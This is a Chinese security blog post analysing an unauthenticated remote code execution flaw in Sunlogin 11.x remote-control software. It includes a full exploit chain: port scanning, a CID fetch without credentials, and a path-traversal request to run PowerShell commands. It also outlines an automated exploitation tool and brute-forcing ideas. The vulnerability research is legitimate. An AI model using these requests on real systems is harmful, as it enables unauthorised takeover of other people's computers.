password
status
date
icon
category
tags
slug
summary
0x00 介绍
今天这么热闹也趁机跟着大佬们分析一波。
0x01 漏洞版本分析
看样子 11.x 应该都是有的,随便找了个下载站下载了个旧版本
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F8fb4e1c7-9f6c-4699-8be1-8093049f3c72%2FUntitled.png?table=block&id=82ad16d3-e503-45a1-b369-bc1594e76b18)
PEID 识别不出来什么壳,不过看 EP 段或者提取下字符串就能看出来是 UPX 壳了。
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F55ceb2c4-326e-4a96-9740-2e3a115c4cd4%2FUntitled.png?table=block&id=03902f0d-6168-4822-aef7-94cd129a304b)
UPX 自动脱壳即可
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F559f0b18-d3c2-4301-ac62-2081376ada56%2FUntitled.png?table=block&id=6d195e3a-c555-4701-a7c5-2936216e9ba7)
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fdb29a390-57b7-40fe-b180-3ede752fc7d0%2FUntitled.png?table=block&id=0446e364-2679-4962-b4fd-32c23b539e63)
通过日志文件找到开启的端口的关键词
直接访问内容如下
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fb4b2e644-02e9-4890-90f3-3c5fcfc3deae%2FUntitled.png?table=block&id=36520180-6928-4553-ae75-849d4cd2e7f5)
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F377eafe5-8f01-4e8e-978d-e4c2e9b63122%2FUntitled.png?table=block&id=f3fa64e1-5d04-4286-bec7-bca2c4bb9908)
在 IDA 上定位到了这里,我的评价是
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F697534a0-8b94-45b0-83dc-aba8fad938f2%2FUntitled.png?table=block&id=c271db9a-1a0d-4735-b217-4c9df70794c7)
看到监听 0.0.0.0:0
端口号 0 是一个预留的端口号,代表的意思就是它在TCP或者UDP网络传输中应该不会被用到。但是在网络编程中,尤其是在unix socket编程当中,它有一些特殊的含义。在unix socket编程当中,端口号 0 是一种由系统指定动态生成的端口。
在 Windows 和 Linux 上,如果将套接字绑定到端口 0,内核将为其分配一个高于 1024 的空闲端口号。
可以通过![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F226db0d1-74b6-4a35-93a2-521544d10091%2FUntitled.png?table=block&id=ed781084-fa4e-435b-9f29-1583ca2fb61c)
netsh int ipv4 show dynamicport tcp
查看 windows 的分配范围
默认是这样的
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F226db0d1-74b6-4a35-93a2-521544d10091%2FUntitled.png?table=block&id=ed781084-fa4e-435b-9f29-1583ca2fb61c)
那想要利用就得进行大范围端口扫描了,从 49152 扫到 65535 ?感觉挺费劲的。 而且还要考虑到这个配置有些时候不是从 49152 开始的,写扫描的时候可以考虑先从 49152 开扫,扫不到再从 1024 开扫,应该能节省点时间。
先康康认证参数 CID
IDA 搜索结果如下
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F39494980-1aa4-4113-a0a2-f4ceb5d6e890%2FUntitled.png?table=block&id=17e1cb0e-df97-4e24-bba9-99410259c3ba)
根据 CID 网上找会返回 CID 的地方
发现接口
/cgi-bin/rpc
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fcd818067-3e93-4607-8606-80db9cdcb36a%2FUntitled.png?table=block&id=7d574bf6-9f28-41c3-afda-7f1cf1309591)
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F2cedda0f-d58d-4726-81f3-a00aecbbfc25%2FUntitled.png?table=block&id=bcccbc4f-edd1-4996-a458-d98513134b53)
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F5211e370-55ed-4f54-8c24-34486ea495df%2FUntitled.png?table=block&id=54df2279-4acf-42ff-8dfc-114cfb07ffa2)
正常逻辑应该是需要 4 个参数才能返回 CID 的,4 个参数分别是
username、password、ctrlclient、verify-haras
正常来说肯定要四个参数都齐才返回认证,但是这里不需要 username、password 也返回认证。![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fe81dfdfb-c850-4117-9fb8-7508423bfc4b%2FUntitled.png?table=block&id=e9e55786-ffd2-492b-8270-e439992650c0)
不知道新版怎么修复的,要是加上账号密码检测的话是不是可以爆破。
获取 CID 的途径还有几个
正儿八经的用识别码和验证码获取
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F64b7c612-6cf3-4d42-a6b9-3fee008553cb%2FUntitled.png?table=block&id=0b536dd3-210a-43c4-80d9-829f938213d6)
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fa4fbc412-a8ff-431a-92a1-7e64a8f08684%2FUntitled.png?table=block&id=b66931fe-6fd1-47c9-a707-1c70cb5edf41)
还有个登录接口也返回 CID
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Ff1ba8cb7-fdde-4a32-b4fe-1eb71795f0a6%2FUntitled.png?table=block&id=44cf5d9c-c3c0-478a-82ea-4bdf5bff52d5)
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fea54af90-b647-41ad-bc30-c9207330cba0%2FUntitled.png?table=block&id=2758812f-900a-4396-9f20-79432f422686)
???这个接口校验的不是向日葵自己的账号密码,反而是 Windows 的密码?那这妥妥的有爆破的风险啊。越来越想看看最新版怎么修复的了。
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F30771d70-5b86-4711-b303-473bbd807e22%2FUntitled.png?table=block&id=4fed1a00-8b65-4bc7-9c33-5ce90017a638)
然后该 RCE 了
找到了两个可能 RCE 的地方
一个是 check 接口
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F83b7e5cf-1e05-4ee1-9df1-d7d65172e26b%2FUntitled.png?table=block&id=a43a732a-57bc-4704-9a00-c6df2a54eda9)
限制为只能执行以 ping 或者 nslookup 开头的命令
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Ff904dd81-6705-44ea-9b60-766d20f5689e%2FUntitled.png?table=block&id=87dd9514-3ba2-4d0e-bfaa-0f905be8cc5f)
看到这种限制:
这我不是乱杀?
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fee0bbe16-d980-49e1-8563-e815aefc21b9%2FUntitled.png?table=block&id=f70fa424-3289-414c-8f25-7864c5069a7c)
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fc40ed73a-44f5-4011-a0c9-f88e976253fa%2FUntitled.png?table=block&id=fc75b25a-7bae-4a63-be2f-63f355b46bc8)
不过这中文乱码是真的恶心
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F7ee05b58-01a5-4154-a693-3389dd7298a1%2FUntitled.png?table=block&id=cb403a4a-fd8a-49b5-b984-44848039751a)
另一个是
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F3eaaafd7-9a80-47a4-be50-3450061c1800%2FUntitled.png?table=block&id=9a9c49d1-8672-4354-9062-b49716b196b3)
限制是有CID,命令要拼接在
文件名 --mod=fastcontrol --fastcode=
后面。一开始以为乱杀的,但是实际上好像不是这样
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F7c26c87a-3484-4988-893e-3ed7002d9876%2FUntitled.png?table=block&id=450b1b1f-1548-4927-9bc1-66eb079e6ccb)
火绒确实监控到执行了这条命令。但实际上并没有效果,把火绒监控到的放到 cmd 里执行是可以的。。。。。。感觉触及我的知识盲区了
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fec9266f2-b7fb-494c-86b5-3cfe5891028c%2FUntitled.png?table=block&id=1ef10b9d-7ac5-46fb-978d-a01d085a5557)
问了大佬得知这里是因为只能在运行参数插内容,具体原理和有没有解决的办法需要再学习下。
应该是没有办法执行的,向日葵支持的命令行参数很少,都不涉及命令执行。
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F51174c59-dcf1-4bc8-8a3a-705c8ffff6c3%2FUntitled.png?table=block&id=66e29483-5c55-467b-aae5-739104a0226e)
0x02 自动化利用工具
这个其实挺好写的
端口扫描
先从49152 扫到 65535(一般扫几百个就有了),怕扫不全可以再从 1024 扫到 49152。
识别端口
这个也好说,检测返回值里有没有
Verification failure
就可以了![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F1b8ad5be-81ca-4498-b9d8-603e3bb8e12f%2FUntitled.png?table=block&id=d5c84f96-af7f-4070-8069-2a8dd561d258)
命令执行
请求
/cgi-bin/rpc?action=verify-haras
得到 CID![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F15e43640-34dd-450f-bd74-f4026c30ccfa%2FUntitled.png?table=block&id=4b4fa578-dda8-4fc1-b7cb-4fa3bdbade85)
Cookie 带上 CID 请求
/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+命令
执行命令![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F6b1b6901-f8b9-40a1-bb17-94c21137760a%2FUntitled.png?table=block&id=056c5cc2-90f5-43c5-89d2-675e320228e4)
0x03 最新版本分析
最新版直接把端口干掉了,那没事了。
之前的端口应该是给手机版向日葵控制局域网设备用的,现在手机版这个功能直接报废了。
不过我认为这应该是临时的解决方案,等到这个功能再上线的时候看看有没有能利用的点。
0x04 免杀
研究着向日葵突然不能用了,可能是官方把旧版干掉了?
- 作者:fatekey
- 链接:https://blog.fatekey.icu/article/xrkrce
- 声明:本文采用 CC BY-NC-SA 4.0 许可协议,转载请注明出处。